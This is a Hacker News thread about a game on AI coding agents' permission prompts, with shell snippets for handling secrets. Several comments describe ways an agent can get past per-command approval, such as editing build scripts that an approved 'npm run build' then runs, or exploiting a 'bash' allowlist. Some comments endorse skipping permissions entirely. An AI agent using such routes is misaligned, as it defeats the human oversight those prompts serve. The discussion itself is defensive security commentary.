Show HN: Continue? Y/N: A 60-second game about AI agent permission fatigue

5/28/2026 at 4:24:07 PM

This is amazing!

Currently you can "cheat" by simply denying all requests as quickly as possible. This will give you the "security-conscious engineer" badge and a perfect score in terms of how many requests were processed. (You will get the "overblock" notification, but it's somewhat tucked away at the bottom and the screen still looks as if you won)

I also tried to play as the hustle4lyfe move fast and break things engineer and simply approved as many requests as quickly as possible - turns out, the "malicious command" popups actually slow you down. Mean!

by xg15

5/28/2026 at 7:45:12 PM

Good catch, this has now been nerfed and this approach has gotten its own title

by Wirbelwind

5/28/2026 at 10:31:39 PM

Actually, the only secure default is to deny everything...how do you know that innocent command is actually innocent?

by smaudet

5/28/2026 at 11:14:38 PM

A strange game. The only winning move is not to play.

by ssl-3

5/29/2026 at 12:57:35 AM

It’s the security mantra: the safest code is the one you never release. Code that never runs is the most secure code

by SOLAR_FIELDS

5/29/2026 at 1:21:54 AM

A computer is only secure if it remains powered off and airgapped.

by brendoelfrendo

5/29/2026 at 2:58:54 AM

Turn off your computer and make sure it powers down

Drop it in a 43-foot hole in the ground

Bury it completely, rocks and boulders should be fine

by HappMacDonald

5/29/2026 at 4:39:26 AM

> rocks and boulders should be fine

You’re setting yourself up for a supply chain attack here if you trust whatever rocks and boulders are sitting around. A well-resourced adversary may have placed power supply boulders and wifi rocks in your back yard.

by onionisafruit

5/29/2026 at 7:03:57 AM

I keep a large supply of thermite on-hand just to make sure that the computer is completely burned every day after it gets dropped into the pit.

Tomorrow is a new day.

by ssl-3

5/29/2026 at 6:54:30 AM

Straight Outta Lynwood was a great album. One of the CDs that I took out of my case the most often as a struggling nerdling who was still a year or two away from having scrounged up enough spare cash for a secondhand iPod.

by JonathanMerklin

5/29/2026 at 9:42:23 AM

Virus alert! I've also burned all of my clothes I may have worn any time I was online.

by yuye

5/29/2026 at 9:31:42 PM

Joshua

by weitzj

5/30/2026 at 6:00:41 AM

Would you like to play a game?

by ssl-3

5/28/2026 at 7:54:54 PM

Top 18%! I denied everything, unless I could see at a glance that it was safe (like Git diff)

by KajMagnus

5/28/2026 at 9:16:21 PM

Glad I could help. I love the new title :D

by xg15

5/28/2026 at 8:07:06 PM

Just like real life! Deny it from doing anything and you're safe :)

by progforlyfe

5/28/2026 at 5:27:30 PM

Fun game, but it showed the lack of security hygiene employed by the game writer. It said `cat ~/.zshrc` was bad because it would share tokens and secrets, but I would never put secrets into my shell rc.

by spurgelaurels

5/28/2026 at 5:50:49 PM

Plenty of people would. But then I guess they're in env and probably already available to Claude

by londons_explore

5/29/2026 at 1:56:41 PM

Just aside from all of the security concerns, this is the wrong place to define global environment variables for zsh in the first place! That would be ~/.zshenv. So even if you're clueless about storing secrets in plain text and exporting them as env vars everywhere, ~/.zshrc should still be clean.

by isityettime

5/29/2026 at 7:17:58 AM

Having "tokens and secrets" at all is a lack of security hygiene.

by otabdeveloper4

5/29/2026 at 4:24:09 AM

I don't do this myself, but I can also see how many would do this.

by shlewis

5/28/2026 at 5:50:12 PM

Where would you put them?

by nish__

5/29/2026 at 3:44:33 AM

Literally anywhere else! Your dotfiles should be publishable to github. If they aren't you're doing them wrong.

A good thing to do is organize. You can actually load different files. Here's a pretty common pattern that you'll find and it'll illustrate how to do other things

  if [[ $(uname) == "Darwin" ]]; then
      source "${INSERT_SOME_DIR}/osx.zsh"
  elif [[ $(uname) == "Linux" ]]; then
      source "${INSERT_SOME_DIR}/linux.zsh"
  fi

You do this for loading based on the operating system. You might want some aliases, commands, or other routines in one but not the other. For example, in my linux one I have stuff for cuda paths. You can do all sorts of things too, like make a (generically named) work file, which you don't publish to github but you load it if it exists. Then you can put all your work related aliases there and not contaminate anything else. Something like `[[ -a ${INSERT_SOME_DIR}/work.zsh ]] && source ${INSERT_SOME_DIR}/work.zsh`.

You shouldn't really load secure keys this way, but others had good answers so I thought I'd at least share a more general pattern since it isn't as well known among the less terminally inclined.

by godelski

5/29/2026 at 7:21:09 AM

Okay. Here is a pattern I follow everywhere in my init files for almost every program. Define two key env vars: $DOTFILES and $ECORP. The first is the path to your personal set of dotfiles. The second is the path to your corporate-specific dotfiles.

On a personal PC there's no need to define the $ECORP var in shell init. On a work PC, define that var.

Based on that alone you can conditionally do almost anything.

- shell source files/aliases

- vim/editors enable disable plugins based on existence of env vars.

- define shortcuts in file manager.

- and i add the following to my main $DOTFILES .gitignore.

  # Any file that contains the following will be ignored.
  # Used to ignore files in corporate environment
  *ECORP*
  *ecorp*

Based on multiple years across different setups, using environment variables was the most reliable option since I have been in places where there are restrictions on where my init files can be placed and having to change a shit ton of paths in my dotfiles or just keeping a different branch for work and personal (and making sure they stay in sync) was too much of a hassle.

Additionally, maintaining hygiene is essential, where I only use a Read Only PAT token on my personal dotfiles in workenv. That way, there is no accidental way I would be able to push from my workenv.
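
A minimal sketch of the two-variable pattern above, in POSIX shell. The file names `aliases.sh` and `work.sh` are placeholders rather than anything from my actual setup, and it assumes `$ECORP` is only ever defined on the work machine:

```sh
# Source a file only if it exists and is readable; stay silent otherwise.
source_if_present() {
  [ -r "$1" ] && . "$1"
  return 0
}

# Always load the personal dotfiles; load corporate ones only when $ECORP
# is defined. aliases.sh and work.sh are hypothetical file names.
load_dotfiles() {
  source_if_present "${DOTFILES:?DOTFILES must be set}/aliases.sh"
  if [ -n "${ECORP:-}" ]; then
    source_if_present "$ECORP/work.sh"
  fi
}
```

Calling `load_dotfiles` from the shell init file is then the only place that needs to know about the split; the same `[ -n "${ECORP:-}" ]` test can gate anything else.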

by analog_daddy

5/29/2026 at 9:44:26 AM

You’re just splitting your dotfiles into a public and a private part. That’s useful if you want to publish the public part on GitHub, but not everyone wants to do this, and the issue of storing secrets in plain text files remains.

by hk__2

5/29/2026 at 3:28:58 PM

  > You’re just splitting your dotfiles

Ummm... yes? That is what I said

  > the issue of storing secrets in plain text files remain.

Ummm... kinda? The problem was that reading an rc file was considered dangerous. Not putting keys in your rc files is an improvement. Encrypting them is even better than that. But I also said more words in the original post and you don't really even need to read between the lines to figure out I said "you can generalize this", especially when there's comments next to it saying "here's how you load an encrypted file"

by godelski

5/28/2026 at 11:53:21 PM

Anywhere else? Password managers have CLIs, operating systems have their own secure storage, and lots of command line apps can store secrets in the OS's secure storage (Windows Credential Manager, Secret Service or KWallet on Linux, macOS Keychain).

Project-specific secrets can be stored locally via something like SOPS or remotely with something like HashiCorp Vault or AWS Secrets Manager.

Applications that have secrets to manage (e.g., Emacs) or are partly about secrets management (e.g., GnuPG, OpenSSH) all store their secrets somewhere else and have secure (not plaintext, sometimes not even on disk) storage options available.

There's no reason to store secrets in plain text in your shell configuration. Practically any choice you can think of is a better one. Even if you did, there's no reason you couldn't store them in a more specific file that ~/.zshrc sources, and let LLM agents read zshrc but block access to the file containing your secrets. (I wouldn't rely on permissions prompts for this, though, lol.)
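
As a rough sketch of the "more specific file" idea: the function below sources a separate file only when its mode is owner-only. The permission check is my own addition for illustration, and any path you pass in is up to you. Note that an owner-only mode does nothing against an agent running as your own user; blocking that still needs a sandbox or a deny rule in the agent.

```sh
# Source a secrets file only when nobody but the owner can access it.
source_private_file() {
  file=$1
  [ -f "$file" ] || return 1
  # ls -ld prints the mode string first, e.g. "-rw-------".
  mode=$(ls -ld "$file" | cut -c1-10)
  case $mode in
    -???------) . "$file" ;;
    *) echo "refusing to source $file: mode is $mode" >&2; return 1 ;;
  esac
}
```

In `~/.zshrc` this would be a single line such as `source_private_file ~/.config/secrets.sh` (a placeholder path), which keeps the rc file itself free of anything sensitive.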

by isityettime

5/28/2026 at 7:17:30 PM

I put mine in various AES-encrypted files (like `~/.secrets.aes`) and then source them explicitly when needed with:

    . <(aescrypt -d -o - ~/.secrets.aes)

I have a handful of aliases/functions to make it more smooth, but that's the core.

by freedomben

5/28/2026 at 7:50:16 PM

Where are those aliases stored?

by maccard

5/29/2026 at 12:09:55 AM

The AES encrypted file has some, plus a bunch of exported env vars. I do keep one function in my ~/.bashrc to make it simpler to invoke so I can do `source-secret ~/.secrets.aes`:

    # Decrypt an aescrypt file and source the result into the current shell.
    source-secret()
    {
      if [ -z "$1" ]; then
        echo "Need filename to source" >&2
        return 1
      elif ! [ -f "$1" ]; then
        echo "File '$1' does not exist" >&2
        return 1
      elif ! command -v aescrypt >/dev/null 2>&1; then
        echo "Could not find required dependency 'aescrypt'" >&2
        return 1
      else
        . <(aescrypt -d -o - "$1")
      fi
    }

by freedomben

5/28/2026 at 8:47:45 PM

In that AES encrypted file.

It's a shellscript that they encrypted. They decrypt it and feed the decrypted output immediately into the shell, to be sourced.

That encrypted secrets file could contain any shellscript, so the aliases are stored in there, together with the API-Keys and passwords.

by AnyTimeTraveler

5/29/2026 at 1:01:09 AM

Another, more secure pattern: have different shell profiles that dynamically inject secrets from a secrets manager. Nix is a good tool for this. Each shell profile configuration calls your password manager's CLI at bootstrap (e.g., when you open a new terminal tab). You authenticate, and at that point the secret is fetched from the password manager and injected into an env var. The advantage over the other approaches mentioned here is that the secret is never stored at rest on the end user’s machine; it is only used in flight.
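
A minimal sketch of the fetch-and-inject step, leaving Nix out of it. `export_secret` is a hypothetical helper, and the command you hand it is whatever your password manager's CLI uses to print a secret:

```sh
# Run a command that prints a secret and export its output as an env var.
# Usage: export_secret VAR_NAME command [args...]
export_secret() {
  name=$1
  shift
  # Nothing is exported if the fetch command fails.
  value=$("$@") || { echo "could not fetch $name" >&2; return 1; }
  export "$name=$value"
}
```

With `pass`, for example, that might look like `export_secret GITHUB_TOKEN pass show dev/github-token`, where the entry name is made up. The secret still ends up in the shell's environment, so anything launched from that shell, an agent included, can read it.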

by SOLAR_FIELDS

5/28/2026 at 6:01:21 PM

Presumably a CLI-accessible password manager (like `pass`) or a GPG-encrypted file (like a netrc-style `~/.authinfo.gpg`).

by setopt

5/29/2026 at 3:54:06 PM

I've recently been enjoying https://fnox.jdx.dev/.

by andrewaylett

5/28/2026 at 6:01:47 PM

Into `pass`, for example:

https://news.ycombinator.com/item?id=48108207

by Hackbraten

5/29/2026 at 7:32:41 AM

Just curious, any reason to prefer using age (you mentioned that you would prefer it if starting over), over something like keepass? I am currently using keepass-cli and only reason i did not use age even though i found it was that it was new to me and I never heard of it (probably not the best reason, but in this era might be a reasonable thing to stick to devil you know). So curious about your take on this.

by analog_daddy

5/29/2026 at 7:05:48 AM

Also, there's nothing inherently insecure about feeding secrets to an LLM, it's only one element of the lethal trifecta.

by arowthway

5/28/2026 at 6:43:55 PM

Weird to make reading zshrc supposedly unsafe when I happily publish it in my public dotfiles repo... Who the hell keeps API keys in it? OTOH it seems like lots of these AI tools keep appending PATH in it so I guess there's a fundamental misunderstanding of shell best practices in the entire AI space...

Additionally, killing the results of `lsof` is _not_ safe - if, say, you have the web page open in firefox, or a client subshell in the agent itself, then boom, there goes firefox and the agent.
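
For what it's worth, a narrower query is possible. This sketch assumes the goal is to free a TCP port that a dev server is holding, and asks `lsof` only for processes in the LISTEN state instead of everything with a socket on that port:

```sh
# Print only the PIDs that are LISTENING on a TCP port, not every process
# that merely has a connection to it (browsers, clients, the agent itself).
listeners_on_port() {
  lsof -t -iTCP:"$1" -sTCP:LISTEN
}
```

Something like `kill $(listeners_on_port 3000)` is then at least aimed at the server rather than its clients, though it is still worth checking what the PID actually is before killing it.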

by socksy

5/28/2026 at 8:05:15 PM

Yeah, the game seems to assert that the kill is safe to run because Claude told me it was safe. But that's the point, I'm not supposed to trust Claude.

by mrgoldenbrown

5/29/2026 at 1:38:51 PM

Likewise I got dinged for denying a random stash-rebase-pop operation. I have no idea what the repo state is like right now. That could be a wild mess of a waste of time. It says I'm doing a refactor, so OK I guess rebase on main is a good idea. But hell no I'm not approving that in the 1 minute before a meeting.

The whole premise IMO is pretty flawed. It's interesting as an ad for the company though.

by gwerbin

5/30/2026 at 1:49:12 AM

> The whole premise IMO is pretty flawed.

I'm not sure, maybe the fact that whether a given command is safe or not is subtle, contextual, and contested actually bolsters the point the game is trying to make.

by isityettime

5/28/2026 at 4:16:42 PM

Fun little game, but I think the questions jump context so much it's a little unrepresentative. It might be better to group things into "packs", which have more real-world representative structure to them. For example, lots of "editing something.js" file permission requests, and then an "npm publish" is far more normal, and it's more of a risk, if you're used to pressing Y lots and then suddenly out of the blue...

by axod

5/28/2026 at 6:38:11 PM

About three quarters of the "bad" choices are things that not only do I not care about leaking but things that an employer would not punish you for doing, even if it led to a production incident.

by orsorna

5/30/2026 at 1:49:59 AM

For example?

by isityettime

5/29/2026 at 3:26:15 AM

Love it. One nitpick.

>npm config set registry https://npm.internal

>Pointing npm to the company's internal registry mirror as required by onboarding docs

It claimed this is safe and I was 50/50 on it but eventually rejected it.

If this README is for a public / forked repo, and that https://npm.internal is actually https://npm.internal.somethinganexternaldnscanresolve.tld

This can go bad really quickly...

In 99% of cases you would have Artifactory / Nexus (or other mirror) already set by company policy. Having a README tell you to use a different package manager url is a big red flag and seconds away from disaster...

by eranation

5/29/2026 at 7:49:44 AM

that's a good callout. .internal is a reserved TLD so it shouldn't resolve publicly, but that's a good point about being wary of changing this while letting claude refactor a project for something that's best configured separately. Moving it to permanent mutation!

by Wirbelwind

5/28/2026 at 8:31:46 PM

The permission thing is a killer to productivity, if you're running Claude I think it's more efficient to just run in a disposable sandbox (like exe.dev[1]) or in some form of docker container with permissions you're personally ok taking the risk with on a personal machine[2]

[1] - https://exe.dev/ is a new cloud provider with some very useful agent UX

[2] - I built https://github.com/stanislavkozlovski/dclaude/ for this; not perfect but gets my job done on the rare occasion I need to run the coding agent locally

by enether

5/28/2026 at 9:41:30 PM

A disposable sandbox won't protect you from secret exfiltration. Assuming you don't consider your code a secret, you could of course set up your sandbox so it doesn't have any secrets, but that would severely limit the kinds of tasks you can use the agent for.

by kvdveer

5/29/2026 at 1:01:57 PM

<< that would severely limit the kinds of tasks you can use the agent for.

Are we just talking about API calls to providers? If so, wouldn't local agent + sandbox solve all that?

by iugtmkbdfil834

5/28/2026 at 10:05:45 PM

On the one hand, you can set up a proxy that supplements secrets for API calls. On the other hand, you can whitelist what you need, in the simplest case with iptables (The devcontainer in the claude code repo is an example of the latter).
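
A rough sketch of the iptables variant, written as a dry run that only prints the rules. This is not the devcontainer's actual script; the function name and the choice of port 443 are my assumptions:

```sh
# Print (do not run) iptables rules that drop all outbound traffic except
# loopback, replies to established connections, and HTTPS to listed hosts.
print_egress_allowlist() {
  echo "iptables -A OUTPUT -o lo -j ACCEPT"
  echo "iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT"
  for host in "$@"; do
    echo "iptables -A OUTPUT -d $host -p tcp --dport 443 -j ACCEPT"
  done
  # Set the default policy last so the accept rules are already in place.
  echo "iptables -P OUTPUT DROP"
}
```

Running `print_egress_allowlist api.example.com` shows what would be applied inside the container. Two caveats: iptables resolves a hostname once, when the rule is added, and a real setup also needs a rule that lets DNS lookups through.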

by esterna

5/28/2026 at 3:50:14 PM

I vibe coded a TUI that just shows running lxd containers

I hit 'n' to toggle all network access minus anthropic and openai URLs.

I use pi (sometimes claude, always on bypass) and I auto allow everything. I only toggle manual approval in rare cases like running a script or command that needs to touch a production system and I need to validate everything.

Normally my container has full write access to staging so it can debug and validate everything on its own

by zackify

5/28/2026 at 5:01:02 PM

Sounds like your process has made you vulnerable to huge classes of exploits and accidents. You have no oversight of changes locally, and only focus on when it touches prod. That means toxic local changes can get in, and if it works in staging why would you look too closely at it before merging to prod? Meanwhile a malicious npm package has made it into your repo, and your staging api keys have been sent to the command and control server.

by kennywinker

5/28/2026 at 8:44:19 PM

i can view the diff locally but often times after planning with opus i get what i want.

I create a draft pr and manually review all items before then marking ready for review for the team.

So I'm not blindly pushing things to prod without review.

Without staging key access I wouldn't have been able to do a payment provider migration at this speed. iterating by migrating users in staging and being able to use and validate the sdk quickly with opus is a massive time saver.

by zackify

5/28/2026 at 3:49:13 PM

That's funny. It told me that blocking "npm run build" was the wrong answer. Maybe it doesn't really understand the threat model.

by cobbal

5/28/2026 at 4:47:20 PM

That's a great example of how dangerous actions are perceived as innocent. The entire model of approving specific commands is absolutely bonkers.

npm run build = run an arbitrary shell command written in package.json

Meanwhile the agent could have done any of the following without approval:

- edited `package.json` to contain any arbitrary build command

- planted malicious code in `build.js` (called by `npm run build`)

- planted malicious code in `node_modules/xyz/index.js` (imported by `build.js`)
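
To make the gap concrete, here is a sketch of what tying an approval to file contents rather than to the command string could look like. Both function names are hypothetical, no agent I know of works this way, and `cksum` is used only because it is in POSIX (a real tool would want a cryptographic hash):

```sh
# Fingerprint the files a build approval implicitly trusts.
build_fingerprint() {
  cat "$@" | cksum
}

# Return 0 if the files still match the fingerprint recorded at approval time.
approval_still_valid() {
  recorded=$1
  shift
  [ "$(build_fingerprint "$@")" = "$recorded" ]
}
```

You would record `build_fingerprint package.json build.js` when approving the build, and re-prompt whenever `approval_still_valid` fails. It still says nothing about `node_modules`, which is rather the point: the set of files a "safe" command depends on is hard to pin down.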

by dns_snek

5/28/2026 at 6:23:08 PM

Yup. The most secure computer is one encased in concrete and dropped into the ocean.

by nonethewiser

5/28/2026 at 8:54:16 PM

Concrete alone isn't enough, you also need to have it be enclosed in a Faraday Cage.

by falcor84

5/28/2026 at 7:48:26 PM

that's a great point, and also the problem with relying on a human-in-the-loop to catch these kinds of issues when it can be circumvented even if they were perfect

by Wirbelwind

5/28/2026 at 6:15:25 PM

What would a better system look like?

by amarant

5/28/2026 at 10:02:29 PM

Agents should make better use of OS sandboxing facilities with finer-grained ACLs.

Less: Do you want to run "npm run build"?

More: "npm run build" tried to read your Chrome cookie database, do you want to allow that?

Some agents like Codex use sandboxing on Linux/MacOS but the permissions are far too coarse - they'll run the command in a relatively strict sandbox and when it fails they'll ask you to allowlist the command as a whole, forever. There should be a new permission prompt every time a command tries to do something new.

Claude suggests (or used to suggest - it's been a while) to allowlist "bash" which completely defeats the point. If you do that the agent can run `bash -c "echo literally anything"`
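
A toy version of the problem, assuming an allowlist that only looks at the first word of the command. This is a deliberately naive check for illustration, not how any particular agent implements it:

```sh
# Naive allowlist: approve a command if its first word is on the list.
first_word_allowed() {
  allowlist=$1
  cmd=$2
  first=${cmd%% *}
  case " $allowlist " in
    *" $first "*) return 0 ;;
    *) return 1 ;;
  esac
}
```

With `"ls git bash"` as the list, `first_word_allowed "ls git bash" 'bash -c "curl evil.example | sh"'` succeeds, because everything after `bash` is never inspected.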

by dns_snek

5/29/2026 at 1:05:49 AM

Don’t rely on your non deterministic agent and its creators to secure your software. Design defense in depth and trust guardrails that don’t expect Anthropic to vibe good security into existence.

If you start by treating any autonomous actor in your system as an actor with the potential to go rogue the design starts to create itself

by SOLAR_FIELDS

5/28/2026 at 6:24:03 PM

Not using agents at all. It could edit your code to do something malicious when you run it. Not even once. Not even if the agent has a gun to your head.

by nonethewiser

5/29/2026 at 2:29:25 PM

Don’t give a fancy random text generator access to your computer.

by xigoi

5/28/2026 at 8:08:13 PM

I got "approve" wrong for `ls -la ~/Documents` but I don't consider simply listing the documents folder a security problem, it's just file names. If it was reading the CONTENTS of them, maybe...

by progforlyfe

5/28/2026 at 11:53:35 PM

I wish the scoring readout at the end would display the LLM's descriptions of the commands I shouldn't have approved. I approved the rm -rf Projects command because I thought the LLM had correctly described that it would delete everything in the Projects folder. Clearly I misread that in my hurry to answer prompts (I knew what the command would do and I guess I hallucinated that the AI had explained it), but I'd like to see what it was that I misread.

Playing this game made me very glad I don't agentmaxx.

by trehalose

5/28/2026 at 4:13:40 PM

Thanks all for checking it out and your suggestions!

If anyone is curious about the actual underlying risks and problems with some mitigations (like the 17% false-negative rates of Auto Mode), I wrote up a quick summary of some of the approaches here

https://scalex.dev/blog/ai-agent-permissions/

by Wirbelwind

5/28/2026 at 8:02:34 PM

You might want to check out https://github.com/kstenerud/yoloai

by kstenerud

5/28/2026 at 3:40:46 PM

I haven't used local agentic AI yet for programming projects. Hence, -187 score

The filter for "commands I would run myself" and "commands I would let an agent run" are very different it seems.

by Liftyee

5/28/2026 at 6:36:02 PM

Thinking about agents as remote junior devs who _might_ be North Korean operatives has been the right model for me.

by rogerrogerr

5/29/2026 at 9:40:15 AM

How do you know?

by jstanley

5/29/2026 at 2:51:42 AM

Yeah, echoing the comments here. It's a good idea - kind of - but it is all about digging deeper when it is sus.

The tool assumes so much. That it is fine to kill a process itself versus just asking you to kill the process. That everyone MUST have passwords in their home directory. It's all meaningless without providing the thing it is running and so no activity is technically safe.

Why do people even get the agent to run the commands it asks to run? You can solve the entire threat vector by running it yourself and giving the agent the output. Claude practically only needs things like sed, awk, and grep. It's a pattern matcher. It's a waste of your (and its) time to have it run your project.

by conrs

5/28/2026 at 4:20:41 PM

--dangerously-skip-permissions is the only way to fly. Of course your environment needs to be properly containerized and autobackup set up, so even rm -rf from your harness would do nothing. Life is too short to spend on replying to permissions requests.

by atemerev

5/31/2026 at 6:29:40 PM

It's true.

I think most people would be horrified about how I run. I just have a hook that blocks obviously unsafe commands (removals, reading secrets, etc) but other than that, the agent is free to do whatever it wants on my machine.

I used to run in a sandbox but for me personally I see these agents as fairly well aligned / intelligent and I am the one prompting them so the risk of injection is none. The hooks are just there to prevent them from getting too ambitious or crafty.

by madamelic

5/28/2026 at 5:07:59 PM

I've seen these suggestions but I am really curious about the set up because I just don't get it.

If you want to work on the code then you need to have access to the repositories, so you need the github token. Then, to test the app, you may need your own backend token. And VPN. Of course, only to DEV, of course all tokens encrypted. So, only DEV and your branch of the code is in danger. In my view, even that is pretty bad.

So, how does such a set up work?

by prerok

5/30/2026 at 2:17:08 AM

> If you want to work on the code then you need to have access to the repositories, so you need the github token.

Definitely not! I only have an agent work in one repo at a time, with cross-repo work coordinated by me. I have a ton of local checkouts and leave them visible read-only to all of my agents. They can look at company code in my local checkouts, and they can download or browse open-source code, or look at it in the .src outputs of packages from Nixpkgs.

> Then, to test the app, you may need your own backend token.

I just don't let my agents test apps that run remotely, for better or for worse.

> And VPN.

This doesn't really expose anything on my system because everything internal that it could hit is authenticated, and it can't access any of my credentials. But I could do a better job restricting network access.

> your branch of the code is in danger

The agent isn't permitted by the sandbox to read the secrets it needs for `git push`. Indeed, I have commit signing enabled and the agent can't even read the files it needs for git commit! It can write code, it can write tests, it can run some tests, and it can run web applications locally and play with those.

But then I do the final testing and then turn its changes into 1-5 git commits, walking through them and selectively staging, skipping, or dropping them hunk-by-hunk according to my judgment. I still do tons of review. I just don't review edits or commands; instead I review and test whole drafts, whole changesets. It's less fatiguing because the thing I'm reviewing is more directly the thing I'm trying to produce.

I guess it ain't YOLO nirvana but I wasn't really looking for that.

by isityettime

5/30/2026 at 6:36:21 AM

Thank you for the explanation but I still don't quite get it. Is this code mounted to a separate VM where the agent is running? I mean, how does the sandboxing of agents really work?

The reason I am asking is because if it's not sandboxed on the OS level, then commands it runs may escape the harness sandboxing. Even more problematic can be a command added to some auto running script that will get executed at some point outside of the sandbox (when the developer is doing actions). So, reviewing everything before anything is executed seems like the only safe way to do it. What am I missing?

by prerok

5/30/2026 at 1:45:34 PM

The tool I use currently is OS-level sandboxing (the OS does the sandboxing), not sandboxing built into the harness (like what Codex has turned on by default) or hypervisor-level sandboxing (i.e., the agent sees an OS that is sandboxed or an OS that constitutes the sandbox). To relax or adjust the sandbox, I have to kill the agent and reinvoke the sandbox with a new policy, which then relaunches the agent.

> Even more problematic can be a command added to some auto running script that will get executed at some point outside of the sandbox (when the developer is doing actions).

That's a real potential problem, but unfortunately the default "approve every edit" regime doesn't actually address it, either. In the normal per-command approval process, the approvals are often just suggestions; Claude will do things like silently edit files in "plan mode" anyway, for example.

If you're deeply worried about this particular kind of sandbox escape you probably don't want the agent's checkout to be your usual checkout. Then if you do have some scripts that can run automatically inside a project directory (e.g., via direnv), you just never approve them in the path to the agent's checkout and make sure direnv's state dir is unwritable inside your sandboxes. If you have code inside your project that runs without any user intervention at all, and has no approval process at all so that it will be activated or trusted even on a fresh clone you've never visited or seen before... yikes. That sucks. :(

Anyway if you take the precaution above you can still review edits to those files before they have a chance to run (or just never run them).

One thing suggested by another user in this discussion that sounds like a useful approach to me is also giving the agent a VM from which they can push to a local bare clone or something like that so that's how they emit code to you. That way they're not writing scripts to your box at all.
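
A sketch of that handoff using plain git, with all three paths chosen by the caller (pass absolute paths) and `make_handoff` being a name I made up:

```sh
# Set up a handoff: the agent pushes to a local bare repository and the
# human fetches from it for review. No remote credentials are involved.
make_handoff() {
  upstream=$1   # your real checkout
  bare=$2       # bare repo the agent is allowed to push to
  agent=$3      # working copy handed to the agent (e.g. mounted into a VM)
  git clone --quiet --bare "$upstream" "$bare" &&
  git clone --quiet "$bare" "$agent" &&
  git -C "$upstream" remote add agent "$bare"
}
```

After the agent pushes a branch, `git fetch agent` in your own checkout brings it in as `agent/<branch>`, where it can be reviewed like any other remote branch before anything runs on your side.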

by isityettime

5/28/2026 at 11:28:22 PM

Git makes actions reversible. Containers and VMs allow the agent to access only the things you explicitly put inside. Okay, yes, an agent can corrupt a dev database. You need to make sure it can be easily restored anytime. Simple.

by atemerev

5/28/2026 at 8:14:09 PM

You could clone the repo yourself and not give the agent any tokens at all. When done, push it yourself. This also lets you sandbox the agent to only have access to the local repo and nothing else.

by stratos123

5/28/2026 at 5:05:07 PM

Lol. Countdown til you get pwned starts today. Let me know how that works out for you in six months.

by kennywinker

5/28/2026 at 11:25:28 PM

Well, I've been working like that for about a year already, starting at the earliest days of agents.

by atemerev

5/28/2026 at 11:36:00 PM

Wow a whole year! I guess it’ll never happen.

by kennywinker

5/28/2026 at 8:03:06 PM

Permissions don't do much. They won't save you. You can just skip them completely.

If you are afraid that AI can delete something, do what you'd do with a potentially malicious user. Sandbox, don't give permission, set up remote backups and so on.

Also (unless prompt injected) models are not eager to start going rogue on your stuff.

But keep in mind a saying “Children don’t hear prohibitions — they hear suggestions.”

Same thing goes for LLMs. Never talk with an LLM about deleting stuff. Archiving, moving, retaining elsewhere... sure, but never about actually destructive operations. Don't use destructive language.

by scotty79

5/29/2026 at 9:20:23 AM

I declined things like rm -rf because the path was relative and it wasn't showing me the current directory. How would I know what project it was in?

by gblargg

5/28/2026 at 5:37:26 PM

I was told I was over protective when the text said “I need to wipe and build my project” and its first thing to do was to read the details of the (already established) package file. Why did it need to read the package file to “get context” if it was just doing a standard wipe and build?

Apparently me telling it that’s the wrong first step and saying “no” is bad; but I’ve seen AI tools waste a ton of time doing a bunch of random work before they do their job.

by t-writescode

5/28/2026 at 3:38:45 PM

I am mostly using OpenCode and barely ever see a permission prompt. While they do enforce it for outside workspace read/write, with the bash tool the agent can just bypass that. I'm not quite sure why it is that way, and it certainly isn't a very good solution, but likely not worse than asking for everything which just trains the user to always accept and provides a false sense of security then.

by ghrl

5/29/2026 at 10:40:36 AM

Is there a light mode by any chance? Unfortunately, I cannot look at light text on black background for more than a few seconds (something must be wrong with my eyes...).

by kleiba2

5/28/2026 at 10:18:17 PM

I've long held that the current agent permission model is like playing a game of "Papers, Please", and that most permission models engineers implement in their own AI products are more a measure of how trusting the user is of AI than an actual permission check.

I'm of the view that future controls should be more about approving plans and rewinding durable workflows as models get better at avoiding egregious mistakes.

by madrox

5/28/2026 at 10:44:42 PM

the models will never avoid egregious behavior. think of it like every "good intentions" morality tale. there's almost always some genuine context where that behavior is wanted.

instead, the coding harness, or some deterministic tool, will need hardcoded security features.

in opencode, almost all the power comes from bash and all other permissions are just charades. it's powerful and insecure because of it.

you can sandbox them but then you fight the sandbox to pipe in your assets. the sandbox becomes porous because otherwise it's useless.

MCPs don't address much either.

what we are looking for is a portal or protocol that has the model and harness and the actions tunneled, like ssh, to some fixed-scope, limited shell alongside the assets.

then, the user and LLM can negotiate assets and actions as needed via the protocol.

but alas, as your comment suggests, people think there's some perfect context that'll prevent bad things from happening. the libertarian paradise without regulation.

by cyanydeez

5/31/2026 at 6:34:54 PM

> what we are looking for is a portal or protocol that has the model and harness and the actions tunneled, like ssh, to some fixed-scope, limited shell alongside the assets. then, the user and LLM can negotiate assets and actions as needed via the protocol.

Take a look at a project I just finished this weekend: https://clawband.io

It's an agent permissioning platform that isolates your service connections and puts a granular permissioning layer on them. So rather than your agent getting full access to a service, it gets a Clawband key that can be used to request actions; Clawband then checks the parameters to see whether the action is allowed.

The classic example I've made is allowing your agent access to privacy.com. You may want it to be able to list your cards but not create one, or you may want to allow creating cards but only up to a certain limit.

The plan is to make it open source and allow self-hosting, for the security and sanity of users, while still having a SaaS offering as a demo and for ease of use.

by madamelic

5/28/2026 at 11:55:11 PM

I think you're choosing to ignore what I said about the implication of durable workflows, because you seem to be inventing some stories about my comment.

I find that well documented plans do pretty well at aligning AI to what I want it to do, and if it does go astray, as you rightly point out it can still do, it would be sufficient if I can undo it with little pain. We do this kind of thing all the time in CI/CD pipelines.

Even humans can take down production. We have all kinds of guards in place to empower while also defending against the intern accidentally dropping the DB.

by madrox

5/28/2026 at 3:27:56 PM

It would be cool to see the distribution of all player scores.

by MeetingsBrowser

5/28/2026 at 4:09:53 PM

That's a great idea, stay tuned

by Wirbelwind

5/28/2026 at 7:44:12 PM

and added! Made one for each stat separately

by Wirbelwind

5/29/2026 at 10:13:22 AM

Claude Code has gotten so bad about this that I’ve stopped using it for code reviews. I may look into wiring Claude up to Codex as an alternative LLM just to compensate.

I think the issue is that I’m running Claude Code in a container so it sees that it is root, and becomes a lot more cautious. Not sure, though.

by christophilus

5/29/2026 at 12:08:48 PM

If you're running Claude Code in a container anyways, why does `--dangerously-skip-permissions` not work for you?

by kangalioo

5/29/2026 at 1:50:48 PM

Claude Code won't let you do that as root. Codex's equivalent is perfectly fine, though.

by christophilus

5/28/2026 at 1:24:38 PM

Use this and save yourself:

claude --dangerously-skip-permissions

by nardib

5/28/2026 at 3:28:41 PM

Just make sure to run it in an isolated environment where it's ok to mess things up, and make sure it doesn't have access to any secrets.

by tasuki

